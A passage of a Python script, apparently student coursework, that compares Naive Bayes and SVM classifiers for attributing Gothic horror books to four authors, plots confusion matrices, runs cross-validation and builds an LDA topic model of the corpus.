f1_score(ybook_test, bookSVMPredict_poly, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict_poly))\n\n#----------------------------------------------\n# with TFIDF\nbookSVM_TF_poly = SVM_Model_poly.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF_poly = SVM_Model_poly.predict(Xbook_test_TF)\n\nSVM_matrixTF_poly = confusion_matrix(ybook_test_TF, bookSVMPredictTF_poly)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrixTF_poly)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_TF_poly.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_TF_poly.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF_poly)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF_poly))\n\n#------------------------------- Confusion Matrix Pretty Plotter -----------------------\n# use some code (used this in our project too)\n# to define a function to draw a pretty confusion matrix\n# found this at https://scikit-learn.org/0.23/auto_examples/model_selection/plot_confusion_matrix.html\nimport itertools\ndef my_plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True Author')\n plt.xlabel('Predicted Author')\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Multinomial NB with CountVectorizer\n# Plot non-normalized confusion matrix\nlbls = ['Blackwood', 'James', 'Poe', 'Stoker']\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB with TFIDF Vectorizer\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelTF_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with TFIDF Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelTF_CM, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with TFIDF Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Bernoulli NB with CountVectorizer\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelB_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Bernoulli Naive Bayes\\nVectorization with Binary Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelB_CM, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Bernoulli Naive Bayes\\nVectorization with Binary Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB - Unigrams and Bigrams\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_ub, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Multinomial Vectorizer\\nUnigrams and Bigrams',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_ub, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Multinomial Vectorizer\\nUnigrams and Bigrams',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB - Bigrams and Trigrams \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_bt, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Binary Count Vectorizer\\nBigrams and Trigrams',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_bt, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Binary Count Vectorizer\\nBigrams and Trigrams',\n cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Linear Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with CountVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with CountVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Linear Kernel with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with TFIDFVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n# SVM RBF Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_rbf, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with CountVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_rbf, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with CountVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n# SVM RBF with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_rbf, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with TFIDFVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_rbf, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Polynomial Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_poly, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with CountVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_poly, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with CountVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n\n# SVM Polynomial Kernel with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_poly, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with TFIDFVectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_poly, classes=lbls, normalize = True,\n title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n#---------------------------------- Cross Validation --------------------------------------------\n# The function works for Bernoulli, MultinomalNB, SVM - Linear, Poly and RBF Kernels\n# it also supports the passing of a cost variable for SVM \n# items passed - then we can use this information to pass in test data from the predicted set\n###------------------------------- Function for doing Cross Validation ---------------------------\n# Author: These programs were provided to me in IST 664 Class by the Instructor\n# first define the function to run the cross validation given the docs, gold standard labels and the \n# the featureset for testing\n# function passing number of folds, feature set and labels\n## cross-validation ##\n# calling cross_validation_accuracy(num_folds, restSentDF, 'sentiment')\n###------------------------------- Function for doing Cross Validation ---------------------------\n# Author: These programs were provided to me in IST 664 Class by the Instructor\n# first define the function to run the cross validation given the docs, gold standard labels and the \n# the featureset for testing\n# function passing number of folds, feature set and labels\n## cross-validation ##\n# calling cross_validation_accuracy(num_folds, restSentDF, 'sentiment')\ndef cross_validation_accuracy(num_folds, df_wlabels, lbl_col, \n modelName = 'MultiNB', cost_value=1):\n subset_size = int(len(df_wlabels)/num_folds)\n print('Each fold size:', subset_size)\n accuracy_list = []\n # iterate over the folds\n for i in range(num_folds):\n #print(\"Fold is \", i)\n test_this_round = df_wlabels[(i*subset_size):][:subset_size]\n #print (\"test round is \", test_this_round.head())\n # build the training set\n if i != 0:\n firstHalf = df_wlabels[:(i*subset_size)]\n secondHalf = df_wlabels[((i+1)*subset_size):]\n train_this_round = firstHalf.append(secondHalf)\n else:\n train_this_round = df_wlabels[((i+1)*subset_size):]\n #print (\"train round is \", train_this_round.head())\n # build train with and without labels\n X_train = train_this_round.loc[:, train_this_round.columns != lbl_col]\n y_train = train_this_round[lbl_col]\n #print(\"X_train head is \", X_train.head())\n #print(\"y_train head is \", y_train.head())\n # build test with and without labels\n #X_test = train_this_round.loc[:, train_this_round.columns != lbl_col]\n #y_test = train_this_round[lbl_col]\n X_test = test_this_round.loc[:, test_this_round.columns != lbl_col]\n y_test = test_this_round[lbl_col]\n #print(\"X_test head is \", X_test.head())\n #print(\"y_test head is \", y_test.head())\n # train using train_this_round\n # create classifer based on modelName\n if modelName == 'MultiNB' or modelName == 'TFIDF':\n # create the Naive Bayes Multinomial classifier (model)\n myModel = MultinomialNB()\n if modelName == 'Bernoulli':\n myModel = BernoulliNB()\n # cost value = 1 is good here\n if modelName == 'Linear':\n myModel = LinearSVC(C = cost_value)\n # cost value = 100 is good here\n if modelName == 'RBF':\n myModel = svm.SVC(C = cost_value, kernel = 'rbf', \n verbose = True, gamma = \"auto\")\n # cost value = 100 is good here\n if modelName == 'Poly':\n myModel = svm.SVC(C = cost_value, kernel = 'poly', \n degree = 2, verbose = True, \n gamma = \"auto\")\n fitModel = myModel.fit(X_train, y_train)\n predictModel = myModel.predict(X_test)\n y_predict = predictModel\n # evaluate against test_this_round and save accuracy\n # Confusion Matrix\n # call confusion matrix with TEST Labels, PREDICTED Labels\n CM = confusion_matrix(y_test, y_predict)\n # Accuracy\n AS = accuracy_score(y_test, y_predict)\n print(\"Fold: \", i , \"Accuracy Score: \", AS)\n # Recall\n RS = recall_score(y_test, y_predict, average=None)\n # Precision\n PS = precision_score(y_test, y_predict, average=None)\n\n # Method 3: Classification report [BONUS]\n #print(classification_report(y_test, y_predict))\n # add accuracy to list\n accuracy_list.append(AS)\n # find mean accuracy over all rounds\n print ('mean accuracy', sum(accuracy_list) / num_folds)\n\n# test this cross-validation function\n# need to do a random shuffle\n# might need them combined before shuffling, and then split out the sentiment column\n# set the number of folds for cross validation\nnum_folds = 10\n# CountVectorizer - with Multinomial NB (Book Author)\nprint(\"\\nMultinomial Naive Bayes with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'MultiNB')\n\n# TFIDFVectorizer - with Multinomial NB (Book Author)\nprint(\"\\nMultinomial Naive Bayes with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'TFIDF')\n\n# CountVectorizer - with Bernoulli NB (Book Author)\nprint(\"\\nBernoulli Naive Bayes with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Bernoulli')\n\n# CountVectorizer - with SVM - Linear Kernel (Book Author)\nprint(\"\\nSVM Linear Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 1\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Linear', 1)\n\n# TFIDFVectorizer - with SVM - Linear Kernel (Book Author)\nprint(\"\\nSVM Linear Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 1\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'Linear', 1)\n\n# CountVectorizer - with SVM RBF Kernel (Book Author)\nprint(\"\\nSVM RBF Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'RBF', 100)\n\n# TFIDFVectorizer - with SVM RBF Kernel (Book Author)\nprint(\"\\nSVM RBF Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'RBF', 100)\n\n# CountVectorizer - with SVM Poy Kernel (Book Author)\nprint(\"\\nSVM Polynomial Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Poly', 100)\n\n# TFIDFVectorizer - with SVM Polynomial Kernel (Book Author)\nprint(\"\\nSVM Polynomial Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'Poly', 100)\n\n#-------------------------- Testing with Predict ----------------------------------\n### OK - time to run the *BEST* models on our predicted set\n# Best Models:\n# Multinomial NB using CountVectorizer vectorization\n# first just use one test using \n# predictVectorDF - is the DF that has the words and vectors as a dataframe (like Xbook_test)\n# PredictLabelArray - is the array of correct labels in an array (like ybook_test)\n\n# let's create just a test set of the authors from our set of four\nfour_predictLabelVectorDF = predictLabelVectorDF[predictLabelVectorDF['book_author'].isin(['poe','stoker', 'james', 'blackwood'])]\nfour_predictLabel = four_predictLabelVectorDF['book_author']\nfour_predictLabelArray = four_predictLabel.to_numpy()\nfour_predictDF = four_predictLabelVectorDF.drop(['book_author'], axis=1)\n#------------------------------------------Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\nbookNB = myNB.fit(Xbook_train, ybook_train)\n# this doesn't work....\npredictPredict = myNB.predict(four_predictDF)\nprint(np.round(myNB.predict_proba(predictVectorDF),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\npredictLabel_CM = confusion_matrix(four_predictLabelArray, predictPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(predictLabel_CM)\n\n# Accuracy - test set\nAS = accuracy_score(four_predictLabelArray, predictPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(four_predictLabelArray, predictPredict))\n\n#------------------------------------------------------------------\n# New function for confusion matrix\ndef my_plot_confusion_matrix_uneven(cm, xclasses, yclasses,\n normalize=False,\n title='Confusion Matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n #plt.colorbar()\n xtick_marks = np.arange(len(xclasses))\n ytick_marks = np.arange(len(yclasses))\n plt.xticks(xtick_marks, xclasses, rotation=0)\n plt.yticks(ytick_marks, yclasses)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True Author')\n plt.xlabel('Predicted Author')\n\n#----------------------------------------- Now do for entire set ----------------------------------------\n# Multinomial Naive Bayes with CountVectorizer Vectorization ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\n# This is the instance of the model - it does not change\nmyNB= MultinomialNB()\nbookNB = myNB.fit(Xbook_train, ybook_train)\n# this doesn't work....\nstoryPredict = myNB.predict(predictVectorDF)\nmyNB.predict_proba(predictVectorDF)\nstory_CM = np.round(myNB.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplbls = predictLabelArray.tolist()\nplt.figure(figsize=(20,20))\n# Plot normalized confusion matrix\nmy_plot_confusion_matrix_uneven(story_CM, xclasses=lbls, yclasses=plbls, normalize = True,\n title='Predicted Author (unseen) Confusion Matrix - MultinomialNB\\nVectorization with CountVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Bernoulli NB CountVectorizer vectorization ------------------------\nmyB =BernoulliNB()\nbookB = myB.fit(Xbook_train, ybook_train)\nstoryPredictB = myB.predict(predictVectorDF)\n\nmyB.predict_proba(predictVectorDF)\nstory_CMB = np.round(myB.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplbls = predictLabelArray.tolist()\nplt.figure(figsize=(20,20))\n# Plot normalized confusion matrix\nmy_plot_confusion_matrix_uneven(story_CMB, xclasses=lbls, yclasses=plbls, normalize = True,\n title='Predicted Author (unseen) Confusion Matrix - BernoulliNB\\nVectorization with CountVectorizer (Normalized)',\n cmap=plt.cm.Reds)\nplt.show()\n\n## 3/12 - ** WORKS TO HERE **\n# SVM Linear Kernel, Cost = 1 CountVectorizer vectorization ------------------------\n#SVM_Model=LinearSVC(C=1)\n#bookSVM_Linear = SVM_Model.fit(Xbook_train, ybook_train)\n#storySVMPredict = SVM_Model.predict(predictVectorDF)\n\n# need to find another way to get data here ** JOYCE **\n#SVM_Model.predict_proba(predictVectorDF)\n#SVMLinear_CM = np.round(SVM_Model.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\n#plbls = predictLabelArray.tolist()\n#plt.figure(figsize=(20,20))\n# Plot normalized confusion matrix\n#my_plot_confusion_matrix_uneven(SVMLinear_CM, xclasses=lbls, yclasses=plbls, normalize = True,\n# title='Predicted Author (unseen) Confusion Matrix - Linear SVM\\nVectorization with CountVectorizer (Normalized)',\n# cmap=plt.cm.Reds)\n#plt.show()\n\n#### --------------------------------- LDA for Topic Modeling ---------------------------\n\n## implement a print function\n## REF: https://nlpforhackers.io/topic-modeling/\ndef print_topics(model, vectorizer, top_n=10):\n for idx, topic in enumerate(model.components_):\n print(\"Topic %d:\" % (idx))\n print([(vectorizer.get_feature_names()[i], topic[i])\n for i in topic.argsort()[:-top_n - 1:-1]])\n \n# Build the topic model using 6 topics\nlda_model = LatentDirichletAllocation(n_components=6, max_iter=10, learning_method='online')\nLDA_Model = lda_model.fit_transform(allbookVectorDF)\n\nprint(\"SIZE: \", LDA_Model.shape) # (NO_DOCUMENTS, NO_TOPICS)\n\n# Let's see how the first document in the corpus looks like in\n## different topic spaces\nprint(\"First Book in Gothis Horror Book Corpus...\")\nprint(LDA_Model[0])\nprint(\"Seventh Book in Gotic Horror Book Corpus...\")\nprint(LDA_Model[6])\n\n## Print LDA using print function from above\nprint(\"LDA Horse Book Model:\")\nprint_topics(lda_model, allbookCV)\n\n# print top 10 words for each topic\nfor i,topic in enumerate(lda_model.components_):\n print(f'Top 10 words for topic #{i}:')\n print([allbookCV.get_feature_names()[i] for i in topic.argsort()[-10:]])\n print('\\n')\n\ntopic_values = lda_model.transform(allbookVectorDF)\ntopic_values.shape\n\n#------------------------------No stemming----------------------------------\n# topic matrix\n# Create Document — Topic Matrix\n#lda_output = best_lda_model.transform(data_vectorized)# column names\nlda_output = lda_model.transform(allbookVectorDF)\n#topicnames = [“Topic” + str(i) for i in range(best_lda_model.n_components)]# index names\ntopicnames = ['Topic' + str(i) for i in range(lda_model.n_components)]\n# this needs to be the booknames!!!!\n#docnames = ['Doc' + str(i) for i in range(len(data))]# Make the pandas dataframe\ndocnames = allbookLabel\n\nbooknames = []\nbook_list_array = allbookDF['book_name']\n\nfor book_name in book_list_array:\n #print(bname)\n bname = book_dict.get(book_name)\n booknames = booknames + [bname]\nlen(booknames)\n\ndf_document_topic = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames)# Get dominant topic for each document\n\ndominant_topic = np.argmax(df_document_topic.values, axis=1)\n\ndf_document_topic['dominant_topic'] = dominant_topic# Styling\ndf_document_topic['Book Name'] = booknames\nlen(df_document_topic)\ndf_document_topic.head(94)\n\nauthnames = []\nfor auth_name in allbookLabel:\n #print(bname)\n aname = predict_author_dict.get(auth_name)\n authnames = authnames + [aname]\n\n## JOYCE GENERATE WITHOUT FANCY COLORING!\nfancyDF = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames)\nfancyDF['dominant_topic'] = dominant_topic\nfancyDF['Author Name'] = authnames \nfancyDF['Book Name'] = booknames \nfancyDF = pd.DataFrame(fancyDF.set_index('Author Name'))\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None): \n # more options can be specified also\n print(fancyDF)\n\n\ndef color_green(val):\n color = 'green' if val > .1 else 'black'\n return 'color: {col}'.format(col=color)\n\ndef make_bold(val):\n weight = 700 if val > .1 else 400\n return 'font-weight: {weight}'.format(weight=weight)# Apply Style\n\n#df_document_topics = df_document_topic.head(36).style.applymap(color_green).applymap(make_bold)\n#df_document_topics\n#display(df_document_topics)\n\n# Topic-Keyword Matrix\ndf_topic_keywords = pd.DataFrame(lda_model.components_)# Assign Column and Index\ndf_topic_keywords.columns = allbookCV.get_feature_names()\ndf_topic_keywords.index = topicnames# View\ndf_topic_keywords.head()\n\n\n# Show top n keywords for each topic\ndef show_topics(vectorizer=allbookCV, lda_model=lda_model, n_words=20):\n keywords = np.array(allbookCV.get_feature_names())\n topic_keywords = []\n for topic_weights in lda_model.components_:\n top_keyword_locs = (-topic_weights).argsort()[:n_words]\n topic_keywords.append(keywords.take(top_keyword_locs))\n return topic_keywords\n\ntopic_keywords = show_topics(vectorizer=allbookCV, lda_model=lda_model, n_words=15)# Topic - Keywords Dataframe\n\ndf_topic_keywords = pd.DataFrame(topic_keywords)\ndf_topic_keywords.columns = ['Word '+str(i) for i in range(df_topic_keywords.shape[1])]\ndf_topic_keywords.index = ['Topic '+str(i) for i in range(df_topic_keywords.shape[0])]\ndf_topic_keywords\n\n# so can see the entire dataframe\npd.set_option('display.max_rows', 1000)\n\n# for plotting\nfancyDF_melted = pd.melt(fancyDF, id_vars=[\"dominant_topic\"], ignore_index=False, \n value_vars=[\"Topic0\", \"Topic1\", \"Topic2\", \"Topic3\", \"Topic4\", \"Topic5\"])\nfancyDF_melted.head(36)\nlen(fancyDF_melted)\n# remove all 0' values\nfancyDF_melted = fancyDF_melted[(fancyDF_melted[['value']] != 0.00).all(axis=1)]\nlen(fancyDF_melted)\ndisplay(fancyDF_melted)\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None): \n # more options can be specified also\n print(fancyDF_melted)\n\nsns.set_style(\"whitegrid\")\nplt.rcParams['figure.figsize']=16,8\n\nax = sns.scatterplot(data = fancyDF_melted, x = fancyDF_melted.index, y=\"value\", \n hue = 'variable', palette = 'Set1', s=100)\n #size = 'value')\n\nplt.xticks(rotation=90, horizontalalignment = 'center', fontweight = 'light', fontsize = 'medium')\nplt.title(\"Dominant Topics for All Gothic Horror Books\", fontsize = 12)\nplt.legend(shadow=True, fancybox=True,loc='right', bbox_to_anchor = (1.1, 0.5)) \nplt.xlabel(\"Author Name\", fontsize = 10)\nplt.ylabel(\"Probability for Topic\", fontsize = 10)\n\n###------------------------------ How many Books per Topic -------------------------\n## Which tracks have the most infractions?\n# count infractions by Race Track\ntopicsDFbyBook = fancyDF_melted['dominant_topic'].value_counts()\n# convert to dataframe\ntopicsDFbyBook = topicsDFbyBook.to_frame()\n# index by Track Name\ndominantNames = topicsDFbyBook.index.values\n# rename column to \"Infractions\"\ntopicsDFbyBook.columns = ['Books in Topic']\n\ntopicsDFbyBook['Topic Number'] = dominantNames\n\n# plot with seaborn\nfg = sns.catplot(x = \"Topic Number\", y = \"Books in Topic\", hue = \"Topic Number\", dodge=False,\n height = 5, aspect = 2, palette=\"Spectral\", kind=\"bar\", data=topicsDFbyBook)\nfg.set_xticklabels(horizontalalignment = 'right', \n fontweight = 'light', fontsize = 'medium')\nfg.set(xlabel = \"Topic Number\", ylabel = \"Number of Books in Topic\", \n title = \"Gothic Horror Authors by Topic - LDA Six Topics, no Stemming\")\n\n\n\n####################################################\n##\n## VISUALIZATION\n##\n####################################################\n\nimport pyLDAvis.sklearn as LDAvis\nimport pyLDAvis\n\n## conda install -c conda-forge pyldavis\n#pyLDAvis.enable_notebook() ## not using notebook\n# MyVectLDA_DH -> MyTxtCV\n# Vect_DH -> MyTxtDTM\n# CorpusDF_DH -> MyTxtDF\n\n#panel = 